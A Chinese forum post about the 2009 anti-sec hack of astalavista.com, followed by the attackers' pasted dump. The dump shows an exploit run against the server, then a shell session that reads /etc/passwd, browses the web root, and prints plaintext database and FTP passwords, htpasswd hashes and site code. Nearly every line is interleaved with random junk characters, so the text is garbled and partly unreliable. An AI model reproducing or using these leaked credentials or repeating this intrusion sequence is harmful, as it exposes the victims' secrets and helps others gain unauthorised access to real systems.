里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 C; E7 A: \8 a- T' Q' H! I+ o8 x1 V3 [6 O/ i6 ]
[root@front3 ~]# curl -I litespeedtech.com7 E2 Z4 w0 e) N
HTTP/1.1 200 OK
- ^* \% S; w2 Z! e* w$ LDate: Fri, 05 Jun 2009 22:54:51 GMT
d3 K' O. J6 X! x8 i( TServer: LiteSpeed/ }2 B7 G* F$ |8 }7 s ~& Y- ^
* L. S% K4 i- y2 Y另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
( k- a. I6 r$ `/ E0 w1 p
0 D( J& F$ u* e& O; q+ x有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
, }7 B V. i& Q B3 S8 {
4 g2 ~- |% F5 x. B$ |
# R2 x$ } U& y( _' Y/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ! x6 C `. W7 F% p0 U$ M; `/ \& y
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \& J& E" L8 P' P' Q3 K2 K
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \, C* Y. Y6 d: b- r( X6 x& [
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ / z( | [! s) v
\/ \/ \/ \/ \/ \/ \/
; M: \. d/ i1 h4 i The Hacking & Security Community
% L& u( X: i" Q9 n, J1 r% t[+] Founded in 1997 by a hacker computer enthusiast# d/ ~3 a5 `! f U
[-] Exposed in 2009 by anti-sec group
. B6 l4 l& ~, R
, L. _0 r* D( K" U& BFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% n* S' I+ O% H' ?7 o0 e
>> 03. Who’s behind the site?9 x$ M# e: I6 n- Z1 c4 v
>>
R$ h5 D6 h7 \ ]9 A( G>> A team of security and IT professionals, and a countless number of contributors from all over the world.) R {" M$ \ S( i% X
' p: R4 f; W4 D+ A
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?5 I2 p0 t& g5 s
>>3 F- Y* j5 s. n$ V$ d& |
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
: }# S8 e" K4 x7 E9 f- r& K2 {+ o2 W- xmilitary institutions.
$ b T/ _! b- F3 G/ R>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
3 n, P$ ]7 y" @: e. Q1 d7 ~2 J" I& _" g3 J6 p
Why has Astalavista been targeted?! f5 m& D2 r% | f( Z" N" d6 Z% o
9 [( f7 c8 |$ H$ E; ]- y
Other than the fact that they are not doing any of this for the “community” but
* p$ Z, e4 C7 ~# u$ C [* S( Rfor the money, they spread exploits for kids, claim to be a security community/ @; o4 m5 f$ B4 d+ u* J* {) U4 O% l
(with no real sense of security on their own servers), and they charge you $6.664 Z9 o* ^1 t$ F
per months to access a dead forum with a directory filled with public releases. j F+ t" ~4 v1 o$ s" f/ j+ |: {
and outdated / broken services.
+ E2 {% B% r6 A* M* Z( u$ n0 r1 G, I8 K y9 K# S
We wanted to see how good that “team of security and IT professionals” really is.5 p) `6 |5 w+ K: z. P7 @6 V7 X
8 o9 z. W& x% A2 |' I3 G/ C: }Let’s begin.
+ E/ W/ U5 u a- j1 c6 e9 ?5 _1 g
; {1 J$ {) W1 m- M4 lanti-sec:~# ./g0tshell astalavista.com -p 80" x" K' r7 ?4 U8 D& u
[+] Connecting to astalavista.com:801 a8 }# U5 R* ?
[+] Grabbing banner…5 @. T2 a) J0 e7 U; P" w5 p( d
LiteSpeed
+ u. N( g9 G( h6 R3 _8 a[+] Injecting shellcode…
' E# k. p/ J: Y, g[-] Wait for it
% K- c/ }8 D. q1 l4 G% \
9 M; ]/ J% X9 N$ b ^$ w[~] We g0tshell& k, w# b( T% i
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
7 H& G) g- C, uID: uid=100(apache) gid=500(apache) groups=500(apache)# s0 E; \: m5 u3 [5 s/ Z# F9 _
8 C4 }, l% n& r* J/ w' ?4 m
sh-3.2$ cat /etc/passwd2 l5 u' `& b: W! G7 W* x
root:x:0:0:root:/root:/bin/bash$ t& S- g% }4 a. ` Q
bin:x:1:1:bin:/bin:/sbin/nologin
2 H! r% u( t, y1 F' R3 \2 |- ndaemon:x:2:2:daemon:/sbin:/sbin/nologin
% _. v$ L4 ^- j5 c% qadm:x:3:4:adm:/var/adm:/sbin/nologin
$ m! \0 r6 n" n, T. m% ^lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( q4 f. j% _) i# ?* q
sync:x:5:0:sync:/sbin:/bin/sync
8 E. S2 q, J( g% d$ D2 r3 rshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
% m3 ?9 t( C- z% `2 i3 ^halt:x:7:0:halt:/sbin:/sbin/halt" H. w K- g8 c7 m9 R$ u
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin6 S9 K/ M. ?. u4 c0 `2 R% `
news:x:9:13:news:/etc/news:
8 A4 d9 a$ ~% H5 b& S o) L9 |2 cuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
) _/ `- f: I! `7 W0 G4 doperator:x:11:0 perator:/root:/sbin/nologin
$ [7 U3 P4 T8 ~; vgames:x:12:100:games:/usr/games:/sbin/nologin+ f" V* P, s5 o# @5 }
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin: t. k( h$ \9 E
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
3 r# }3 D% L9 C* F6 E4 j6 R, wnobody:x:99:99:Nobody:/:/sbin/nologin! o: }" Y$ \4 j+ l& V
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
! ?6 O0 Z) t& C5 A0 ?$ w/ kdbus:x:81:81:System message bus:/:/sbin/nologin' u R5 ?: W L6 p8 n/ ^
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin% c* k4 y" ~) Q! z x: r
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin* t" G/ R0 y2 E
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
, j X) q& H& h9 [' Q& [( |+ Hvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
: Q7 J# q8 ?, s; c9 }! shaldaemon:x:68:68:HAL daemon:/:/sbin/nologin) }; O. Y$ U: a: ]
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin5 w& \ F( \4 W% V" I/ C" s2 V
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
' {) q+ n+ Q! I" z5 b- K& Cnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
2 h" b2 R% V4 lsshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
& v6 P) c4 y+ @* ~% a6 _1 spcap:x:77:77::/var/arpwatch:/sbin/nologin' A% g$ {- e1 @* E% W
named:x:25:25:Named:/var/named:/sbin/nologin
* y; f9 a e, n' V) U; N# Z) kapache:x:100:500::/var/www:/bin/false
8 u# o' y4 z# W7 q. u6 O) vdiradmin:x:101:101::/usr/local/directadmin:/bin/bash$ K5 Y* k) d3 N' d% w: m Y& E* Y
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash9 |4 y6 S' Q5 ?7 w, S/ U; E4 j5 N$ I, K
webapps:x:500:501::/var/www/html:/bin/bash
- i$ W0 N2 U0 _7 ?6 Cmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash5 c6 R9 T' i* \5 ?
admin:x:501:502::/home/admin:/bin/bash
8 O9 W# |& m( g$ Djon:x:502:503::/home/jon:/bin/bash
) z1 e' T B; Rcom:x:503:504::/home/com:/bin/bash
# {& B% _5 D, Dntp:x:38:38::/etc/ntp:/sbin/nologin# S j1 T% `4 p. e V2 S* Z5 M
ais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
" D+ M* Y% ?- pastanet:x:504:505::/home/astanet:/bin/bash
2 ^' Q2 |3 W* k2 b/ G+ ~* Aavahi:x:70:70:Avahi daemon:/:/sbin/nologin( ]9 a7 s6 a) P5 i: ?
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
s+ b# Z: [4 a% ]. q3 W8 p+ k1 T8 H7 P' V- K
sh-3.2$ cat /etc/hosts+ }9 a# P+ f7 Y2 M2 P
# Do not remove the following line, or various programs! V# x9 \5 f, i; j/ q
# that require network functionality will fail.6 q: z, M+ V1 T. b
127.0.0.1 localhost.localdomain localhost! [% i& j0 R- o( ]9 }# P
::1 localhost6.localdomain6 localhost6/ g% z' o7 S/ s1 c, d! ?1 ?
80.74.154.172 asta1.astalavistaserver.com
7 u$ B4 |' p+ r6 T3 l0 K6 _ o3 y, i& \. B
sh-3.2$ pwd7 I( l8 l- o5 s8 D h) H) t* H
/home/com/public_html4 a: \0 D" l; g' h( o$ a
, p! d. h% B' N: B$ O
sh-3.2$ ls -la u5 o! ?1 M3 f
total 184600 q. m4 Z: M( R5 _
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
% ~4 D. M0 c$ h7 j2 S' r6 adrwx–x–x 11 com com 4096 Jun 25 2008 ..: B1 L4 j2 h/ g' z {
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin4 \% N) M8 N5 ~+ p" w/ ?: n
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
4 B! l1 e0 S5 Xdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
* k4 g5 I$ F3 g/ d; ndrwxrwxrwx 2 com com 4096 May 19 00:50 config
; B9 n O/ J- a% A; Wdrwxr-xr-x 2 com com 4096 Mar 20 11:05 core( [% B8 D' Z# _! n
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
+ v' `+ [; }" t) q* @) ldrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
$ O; e8 n6 |' H. A6 Ndrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo% M4 _6 V' Z# U# N0 d( u
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__5 Y1 U* L2 M* `- R5 T
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php: r0 ]' O& ?4 w9 h" ?: u$ K
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
( i9 V' \$ p) O0 Y$ |7 [7 r* _drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor1 r8 h, d- t5 K
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico; d. h0 U. t+ n4 u8 q
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
- H! O; P% o7 L9 A2 ~0 I' P# _-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
: d& I3 s9 Y- t9 k1 U( W4 d-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak! H. J; o" O6 o: f& m3 v
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
" S, @8 r# H9 J% V( D8 ]0 jdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
0 f0 } T4 k) b* H; _6 @& E+ Bdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
$ J2 D# H1 M* g; j-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
2 V- k( G9 a& _. Ydrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
8 x4 _5 \5 d2 T% {0 Odrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang) A# Z( o0 {6 e4 d( L1 C
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
3 K2 M# J* u1 e) c: rdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
! Z, }! H+ W5 l- P3 {; S# Pdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications5 W% \% F" H( A' `3 B# c
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
! A) e! `) @7 b1 ?: ?; ndrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
) F' v) G0 L6 I( a* fdrwxrwxr-x 22 com com 4096 May 28 17:06 _new# f6 C( Q( f- a0 m( c8 y% ?8 }
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
O: o* _4 o. u9 l: Ddrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
& |+ \# S- a* n4 b; e+ M. {drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
) l5 `0 h) {, E' q" ~1 G) _3 c-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
/ g. O8 |- J6 I) @9 O-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
( ?' ?/ N7 I1 ]- r-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
: p1 ^* _% H- r& ?' i5 qdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes$ y+ Q6 \" i0 }
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
5 |1 k4 Z- q8 L. G6 ?# idrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
- g5 _% F" b4 S2 @
, k9 z0 c' k5 g/ e1 hsh-3.2$ head -20 index.php
' X; L) |. H3 s [. B<?php
0 A3 `+ b+ |# F' }; T9 ?% ~) i. S! C9 c5 J) z# V
/**
' v2 \2 ~% u) b5 P( H& H% x* The main page for the CMS
7 Z& }8 J" C. L+ ?* d5 ?* @copyright CONTREXX CMS - COMVATION AG T3 ?8 `, W( Z% ]6 }9 P0 {- W
* @author Comvation Development Team
6 I3 } }+ t+ }* {" h# N* @version v1.0.9.10.1 stable
$ ]. @9 y3 d) G8 T* @package contrexx& B8 N* r0 Q# }$ n. f- n- F
* @subpackage core: q! `1 ~: t3 B, n! J( u
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
7 g ~! X: [2 D. b* ?3 J* @since v0.0.0.0
- D2 a" I6 o& u0 m* @todo Capitalize all class names in project4 a+ }/ I& X/ y4 ?
* @uses /config/configuration.php+ O! C8 I+ n& v( B- z
* @uses /config/settings.php: w/ t9 X1 h8 X6 N
* @uses /config/version.php
0 a8 s8 @$ j. u* @uses /core/API.php
: [6 X3 u8 H+ n! C) y; m0 |% ?! {* @uses /core_modules/cache/index.class.php
$ X2 _' ~% V( @7 d, }0 q; j4 k* @uses /core/error.class.php
: G2 I* w+ ]+ q* @uses /core_modules/banner/index.class.php% l* ?0 g3 Q& _1 K6 G
* @uses /core_modules/contact/index.class.php
( j3 W1 @9 V$ V$ d/ v3 J0 m1 E
4 t1 k: Y w! b% q2 Ish-3.2$ cd config/) {. A' c2 ^" V9 F r
sh-3.2$ ls -la
% C. i: H- a/ rtotal 32; z+ }; C- E8 O% i
drwxrwxrwx 2 com com 4096 May 19 00:50 .0 \- u3 _- _$ [1 G8 d( v
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 V6 }2 Y# N& c7 w& ?( v" y
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php) @$ z9 ~/ U; X5 Q
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
d4 y0 y* L' P$ E8 J& P-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
6 k. _1 T. ~( B% d' E& K-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
; n+ M, o7 ?& ~* l1 g4 G
, |4 b) `! j0 c1 L% csh-3.2$ cat configuration.php
! w1 A, W N# n/ E& M5 x[snip]
* n- h- c ]4 i( ~$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost. G, E/ K* ~2 V) {1 Y) }3 m3 v
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name7 A8 F% c+ o+ R! P! b( I
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix; N" T% f1 d. g. S7 e8 w, P2 d% P
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
& N2 L+ G8 U7 A5 F$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
1 Q# W1 a; A/ G5 A; V5 O; M$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
" s; j( F7 H. U) `$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
. I/ R" V- L" ]+ S' M: I$ }& i[snip]
0 O$ h" {0 S8 I6 K. A8 o V; k1 g$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
1 _# F) c: [" x$ f( I$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
4 L7 C* x& p5 g; P, H$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
, n- y) F1 d/ Z& K. E' P' s$_FTPCONFIG['port'] = 21; // Ftp remote port
. M; s5 Y/ {$ O$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
& V6 W! S( b0 [( d$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
' G& y8 R, ~- j/ k1 m) ?$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
# @, n9 \ B5 b, K" o
: h: s3 I8 D) I, h5 q4 y3 A* N) Rsh-3.2$ cd ..7 h; i" [1 ]3 z; Q/ B7 v
sh-3.2$ cd dvd/
" I/ P7 p8 p1 W0 e2 P6 U, |sh-3.2$ ls -la: d2 H& {$ [$ F$ {) U8 B5 r
total 29137805 ]* E8 b0 M! g4 y K5 ~7 P+ Q
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
: M( G! J' L% \; s# udrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: w2 f) S( |+ o7 Y-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
6 J: R7 d9 b+ W5 b" V+ T- }1 K-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar' e P0 P, F6 ~" K* L
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar4 X2 E; g4 V1 ?% B# V
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess0 a, }/ C9 t* H' ]" z' P
& J8 ^" u) k' k5 \ g1 i
sh-3.2$ cat .htaccess5 e! a* P- |% C Z
authType Basic4 d' G! i! N9 W/ N7 E
authName DVD
* {* c- {% k/ x/ U% k: O9 T% V k( bauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd5 m) e# @. I9 r1 A4 X0 u2 `
require valid-user
* J* N. @# u8 u. C& `
7 W# D8 A/ L' Z0 P6 i4 M$ ] ysh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd- T# }5 D0 {7 p1 U! H
DVDdownload:CRD8cuY6.MPT6
7 S6 H' h6 U# k6 G) n) K/ E$ I2 {DVDdownload2:CR8a36.wluFMg2 L8 [# |4 s% K. O6 q, \
% g/ ]' e2 ?- y7 `: N& Y8 l, j
sh-3.2$ cat test.php/ q% o) O. ~# f6 u" L# n$ H5 m
<?php
; R- f8 [+ K4 u5 ]! j2 I- z$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
- h, O+ d7 u2 z' o; X/ _, s) X7 O$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
7 Z. h# W! R; E/ h9 E. zecho $url;% ^/ N8 v4 s& b2 O* E K
?>
+ d7 {. q/ \1 J" j/ M
+ p5 k$ \2 O3 ?% R7 Y/ g1 c9 F/ _& qsh-3.2$ cd modifications/6 p6 d" t) B% ^9 C# w
sh-3.2$ ls -la
# b0 K9 y0 Q& x5 e6 ?- X( Htotal 32
% p6 r; k: c& V. f- P; q5 `" rdrwxr-xr-x 8 com com 4096 May 11 12:48 ., m G4 L, Q2 l, Q6 i% p" y; `
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
0 @) q' n& `+ J8 c- [drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
G( u. c* I% y0 G( Ydrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
$ ~3 j3 D, O' H1 l( cdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
' m( Q, d5 i+ ?* Q, N: ~; q; b* B7 Gdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
( Z4 Z h8 O% P6 K l+ Bdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search+ w3 ^/ W7 `9 n" S
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp7 N g6 W2 c7 }2 I2 Y6 H
+ ~$ s- ^; L' b. {$ T9 ash-3.2$ ls -R! T# p2 H+ A e5 g# U
.:
" Z+ ^; Y G) X4 N6 Ycom_avtng cronjobs onlinetools pjirc search _tmp
6 G8 j a0 D! Z _7 E
3 N, }/ Q( d- Q. ?./com_avtng:- N5 K) S+ b2 |: Q
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
^1 m6 T+ E. V% q. ~
" J7 l3 f% E2 y4 {) y./com_avtng/scripts:
8 Q0 N1 z4 c* M8 F, e& v" c9 d* M! E7 @popunder.js
; K7 K4 Y3 k6 K+ _8 E/ _
8 g1 O1 | ?: D, }0 z./cronjobs:
& s5 b7 E; Z3 H, e, E4 N- zexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
6 s6 `" I6 E: C' Q
; x) k$ n: D- p$ d. u./cronjobs/tmp:
* Z) H; F- K* z* J( Y9 b! |5 ^, ^" mcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv$ j, c8 p$ t/ p5 Y' q
5 l9 N/ B5 ?$ h" g./onlinetools:
8 g+ u8 j- L& [2 Q7 r, z- H/ |+ Rindex.php
, i7 L& C$ q3 G& J, X6 p T" J& l" V
./pjirc:# h* J; Y( Q, I/ ~& |
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
& x' g1 R0 ^# u( DAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt# W6 t, w- C% e" k/ o7 Z
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd' R' U, Y; S$ ?
* S( |+ I' n2 f/ `! Q5 G; H
./pjirc/img:
2 C! U6 O, k2 D# Z. F4 @! Xange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif: Y* C: G: P3 k& a
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif + _; P8 n- v0 m; n( u1 W
verre-eau.gif
! {. f- ?5 o( |) Z k" eargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif ) _/ r4 Z4 y* ]4 m! |) X
verre-vin.gif
+ O A3 B9 ^$ X* g5 v; ^: H& Rballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif" d ^5 u! z- n3 ?3 A7 v% v
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif: X( s+ |; ?# }4 }: u* ?, V0 h" W
$ M! }$ u; @' R* q" p/ P4 I
./pjirc/snd:
3 m5 T' O" l( R" wbell2.au ding.au D$ R" {3 ?+ O. {4 v
& d2 Y: I C; h2 Z1 ]8 b./search:! I, s; S4 O A
searchEngines.php search.php
3 A" D( a" F; e2 T" [- q, q7 w0 _* Y4 _
./_tmp:
- k; n/ [0 N, A' odefaultPorts.php defaultPorts.txt
v6 G8 s! f, c. q* p
3 J/ [8 z- C) R* U, M5 T8 _( |sh-3.2$ cd cronjobs/ ]9 d7 E' A! G! t# j1 {
sh-3.2$ cat exploits.php: c+ `2 b& w7 g9 @& b9 R" a
[snip]/ ?" ^) Z! o' Q
$categories = array();" p' H5 f: P4 S* \* s! ]
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;3 l$ K: B8 u( r2 O
$expolits = file($milw0rmFile);; r P) |9 f1 b, x0 A9 e
$comExploits = array();
. J* M5 G3 y; E, g H[snip]
: v' } F; h: w9 j$ U: G6 A4 `// manage data
$ F* h6 [4 C5 Ffor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
/ r) K3 h' m6 j: o. k/ |! ?' `
3 s) G- X( c# ] // get path and title
! l* ?) c6 k& X2 f* j) n9 q9 X $expolits[$x] = trim($expolits[$x]);# T6 x. F) y5 _1 p
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));! F7 J5 ^4 Y' W
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
) u0 B9 p9 z" ~/ B1 f# Z6 I' V- @, m0 ]2 b1 w
// check if file exists$ c c; G8 d7 Z$ |* x1 _$ T
if (file_exists($path)) {8 {; X2 _ v$ {" q
. P2 s' |" F! w" B: ~: w
$text = file_get_contents($path);! E0 L1 l* S3 ?
% E; Q v3 P( c6 G. a+ T o // get content and date
) ?$ S# o2 |) u7 @8 s; ?& x! G* E1 m //$text = htmlspecialchars($text, ENT_QUOTES);3 C& ^* s1 [. |7 Z! n5 M
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));4 o( I& |' M+ Y6 J
if ($tmptext != ”) {* C! m/ Z+ [+ `6 Q, w. _
$text = $tmptext;
& Y! { ^4 n W4 H% r2 X } else {* E6 a2 C4 ~3 B1 m
$text = addslashes(htmlentities($text, ENT_QUOTES));$ q# D9 w1 p1 o
}
$ Z5 `/ h7 f& j9 v" H& A $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
# d1 n4 d5 q0 _- l4 V0 X $tmp = explode('-', $date);- J& @. y; g- z# o1 m
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( }6 t; l5 F5 I8 e. j9 c8 @ e $cat = getCategory ($path);- R; X$ p8 u' {* g' ?9 d
$ext = pathinfo(basename($path));9 Z! D; T: u, B1 ^7 x7 n- `
$ext = $ext['extension'];
+ G! `- e% h* n; f1 {' a $qStr = ”
* a3 X, |% d0 s6 |! x' R! Y SELECT `id`: S2 C7 K7 \0 o, _' I' e
FROM `contrexx_module_exploits`! B; Z8 I# o& B
WHERE `title` = ‘” . $title . “‘2 L& D: B- e; Q/ M
AND `date` = ‘” . $date . “‘
2 Y* A- j9 i/ J! x “;
& w+ t1 H7 q: F7 G* J: F2 d! ~# J$ k echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
0 ]) p/ a6 S! P8 e $q = $_objDB->query($qStr);! \. B; |! P% |' E
5 E8 j; I$ H7 C, o" {1 f# @5 h if ($q->numRows() == 0) {. a4 _( s9 V; g4 I3 y: I
, Z3 X! Z3 m( A7 q3 r' x( D6 E // prepare array
2 \0 @* W# X8 @$ z+ a $comExploits[$x]['date'] = $date;
- R) ?6 {4 ?' J' E $comExploits[$x]['title'] = $title;
* Y: ?! v( C" t# N $comExploits[$x]['author'] = ‘milw0rm’;* J( u0 B6 R, m# d7 n2 N3 G! ?* s
$comExploits[$x]['text'] = $text;. x! H5 Z! l) z l1 S/ y
$comExploits[$x]['source'] = $ext;
8 V; e& k) Q1 w4 }- i( f $comExploits[$x]['url1'] = ”;
1 q4 F7 }5 ^- h" e$ h9 d $comExploits[$x]['url2'] = ”;
}/ i, v" r* @( Q( j $comExploits[$x]['catid'] = $cat;
+ T5 M/ Q l9 P) j9 _$ c $comExploits[$x]['lang'] = ‘2′;' Z5 R/ T0 P2 V9 ]/ \( e+ t j* x/ L8 `
$comExploits[$x]['userid'] = ‘12′;
7 Y) I: A6 d4 A) f0 Z9 _9 ^! g $comExploits[$x]['startdate'] = ‘0000-00-00′;) ]3 Y0 m4 N7 F4 s
$comExploits[$x]['enddate'] = ‘0000-00-00′;
: [4 K" @# c( i# Q $comExploits[$x]['status'] = ‘1′;
+ t+ j7 N; X1 Z! N $comExploits[$x]['changelog'] = $date;
/ L. A1 S( x4 c% i8 x
* ~" `, V6 ?) Y, g5 s* h5 B5 a u }
* U" ]9 p, m# F[snip]
- @" T b! J0 S $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>9 _1 r6 V: T1 O G) v9 K
<rss version=”2.0″>" x3 z" B9 y! Z% m. K" q
<channel>
* o1 Z3 n# h0 i) Y" | <title>ASTALAVISTA.com - Exploits</title> R( ]) M4 b' o4 @# d
<link>http://www.astalavista.com/exploits</link>
